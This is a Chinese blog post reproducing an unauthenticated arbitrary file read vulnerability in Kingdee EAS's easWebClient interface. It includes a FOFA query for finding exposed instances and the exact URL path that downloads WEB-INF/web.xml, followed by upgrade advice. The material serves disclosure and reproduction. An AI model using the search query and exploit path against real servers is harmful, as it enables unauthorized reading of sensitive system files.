当前位置:   article > 正文

金蝶-EAS easWebClient 任意文件读取漏洞复现_金蝶-eas easwebclient 任意文件下载漏洞

金蝶-eas easwebclient 任意文件下载漏洞

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。

二、漏洞描述

金蝶EAS easWebClient 接口存在任意文件读取漏洞,未经授权的攻击者通过该漏洞读取任意文件,获取系统敏感信息。

三、影响范围

未知

四、复现环境

FOFA:

body="easSessionId" || header="easportal" || header="eassso/login" || banner="eassso/login" || body="/eassso/common" || (title="EAS系统登录" && body="金蝶")
  • 1

五、漏洞复现

1.访问存在漏洞的网站
在这里插入图片描述
在这里插入图片描述

2.直接访问ip+port/easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml即可下载文件

3.成功
在这里插入图片描述

六、修复建议

官方已修复该漏洞,请及时升级到最新版本。

https://www.kingdee.com/
  • 1

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/137927
推荐阅读
相关标签
  

闽ICP备14008679号